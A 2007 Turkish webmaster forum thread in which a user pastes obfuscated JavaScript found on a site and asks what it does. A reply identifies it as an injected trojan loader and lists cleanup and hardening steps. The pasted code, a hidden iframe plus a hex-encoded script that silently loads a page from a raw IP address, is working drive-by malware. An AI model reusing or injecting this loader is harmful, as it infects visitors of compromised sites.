Webmaster Forumu

Geri git   Webmaster Forumu > Webmaster Kaynak Eğitim Tanıtım Hizmet > Webmaster Genel Konular

Webmaster Genel Konular Webmaster Genel Konular

Cevapla
 
LinkBack Seçenekler Stil
  #1 (permalink)   iTrader 
Alt 2007-12-15, 08:40
sverdlow - ait Kullanıcı Resmi (Avatar)
Red Rose
 
Üyelik tarihi: Nov 2005
Nerden: Ankara
Mesajlar: 1.682
Tecrübe Puanı: 4
iTrader: %100/11
sverdlow will become famous soon enough
Standart Şu Javascript Kodu Nedir?

bu kod hakkında fikri olan var mı?
ne iş yapabilir, maksimum yapabilecekleri nelerdir.
aklıma cookie çalmak geliyor ilk önce. firefoxa işler mi?
Kod:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4762e640a5959(v4762e640a5d40){ function v4762e640a6129 () {var v4762e640a650f=16; return v4762e640a650f;} return(parseInt(v4762e640a5d40,v4762e640a6129()));}function v4762e640a68f6(v4762e640a6cdf){ function v4762e640a7897 () {var v4762e640a7c80=2; return v4762e640a7c80;} var v4762e640a70c5='';for(v4762e640a74ac=0; v4762e640a74ac<v4762e640a6cdf.length; v4762e640a74ac+=v4762e640a7897()){ v4762e640a70c5+=(String.fromCharCode(v4762e640a5959(v4762e640a6cdf.substr(v4762e640a74ac, v4762e640a7897()))));}return v4762e640a70c5;} document.write(v4762e640a68f6('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6166207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3933343936292B27316336636331653834355C272077696474683D343033206865696768743D323332207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
__________________
...
Alıntı ile Cevapla

  #2 (permalink)   iTrader 
Alt 2007-12-15, 09:45
nokie - ait Kullanıcı Resmi (Avatar)
Senior Member
 
Üyelik tarihi: Mar 2005
Nerden: pompano beach
Mesajlar: 712
Blog Entries: 2
Tecrübe Puanı: 3
iTrader: %0/0
nokie will become famous soon enough
Standart

bu kodu derhal o sayfadan kaldır, ziyaretçilerine trojan download ettiriyor başka bir serverdan, biri serverına erişmiş.

malware bu, serverındaki tüm index.* adlı dosyaları otomatik yerleştiriyor kendini.

serverını olası exploitlere karşı tarama yap, /dev/shm, /tmp, /usr/local/apache/proxy , /var/spool, /var/tmp dizinlerine perl script olarak bulaşıyor.

ayrıca bilgisayarınıda full virüs taramasından geçirmeni tavsiye ederim, kullandığın web editörlerine kadar bulaştırıyor kendini (notepad, ultraedit, dreamweaver v.b.) dosyayı kaydet dediğinde sayfanın en altına ekleniyor kod otomatik.

Yapacağın işlemler:

1. Serverına eriş, /dev/shm, /tmp, /usr/local/apache/proxy , /var/spool, /var/tmp dizinlerini korumaya al ve dizinler içindeki olası exploitleri tespit edip temizle.

2. Site için klasör ve dosya yazma izinlerini kontrol et (chmod 0777 olmamalı)

3. Siteye ait ftp şifresini değiştir.

4. Serverda bulunan tüm index adlı dosyalardan trojan javascript kodunu temizle.

5. Kodun bulunduğu siteye girdiysen bilgisayarını full antivirüs taraması yaptır, bilgisayarına bulaşan malware'i temizle.

6. php_safe_mode aktif et.

7. sitende klasöre yazma ihtiyacı duyan yazılımlar varsa, klasörleri dışardan erişilmeyen bir yere taşı (public_html dışına, script yine çalışır) bu sayede chmod0777 guvenle kullanabilirsin.

8. siten için tüm alt klasörleri sh, .pl, cgi v.b. dosyalarının dışardan çalıştırılmaya kapat, htaccess ile bunu yapabilirsin.

9. server root ve normal kullanıcı şifrelerini değiştir.

10. son olarak serverını bütüyle elegeçirmiş olabileceğini düşünüyorsan bir sistem yöneticisine başvur.

Konu nokie tarafından (2007-12-15 Saat 10:04 ) değiştirilmiştir..
Alıntı ile Cevapla

  #3 (permalink)   iTrader 
Alt 2007-12-15, 12:32
sverdlow - ait Kullanıcı Resmi (Avatar)
Red Rose
 
Üyelik tarihi: Nov 2005
Nerden: Ankara
Mesajlar: 1.682
Tecrübe Puanı: 4
iTrader: %100/11
sverdlow will become famous soon enough
Standart

anlattıkların için sağol, ama bende sorun yok, bi sitede gördüm ve dikkatimi çekti.
random olarak her seferinde başka bir iş yaptırıyor, yahoo maile bağlanıyor vs.
bilgisayar o siteye girince biraz kasıldı, ama iyice kontrol ettim, bir sorun yok görünüyor.
__________________
...
Alıntı ile Cevapla

  #4 (permalink)   iTrader 
Alt 2007-12-15, 14:27
Breeze - ait Kullanıcı Resmi (Avatar)
Senior Member
 
Üyelik tarihi: Apr 2007
Nerden: CTRL + W
Mesajlar: 944
Blog Entries: 1
Tecrübe Puanı: 2
iTrader: %100/3
Breeze will become famous soon enough
Standart

ie6 ile girmişsen bilgisayara virus bulaştırmıştır
diğer tarayıcılarda iş görürmü bilmiyorum
__________________
...
Alıntı ile Cevapla

Cevapla

Seçenekler
Stil


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
İlginç Bir Javascript Kodu Deneyin... StrOGG Javascript Ajax ve Frameworkler 16 2007-03-08 19:59
Aynı PUB Kodu Farklı Sitede Reklam Çıkma Yöntemi nedir? visitistanbul Google Adsense 6 2006-12-29 03:02
Yapı Kredinin Yeni Swift Kodu Ve Banka Kodu canparlak Google Adsense 8 2006-10-29 13:56
Javascript kodu lazım eTre Webmaster Genel Konular 5 2006-07-22 02:18


Bütün Zaman Ayarları WEZ +2 olarak düzenlenmiştir. Şu Anki Saat: 13:19 .


Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.2.0

Firefox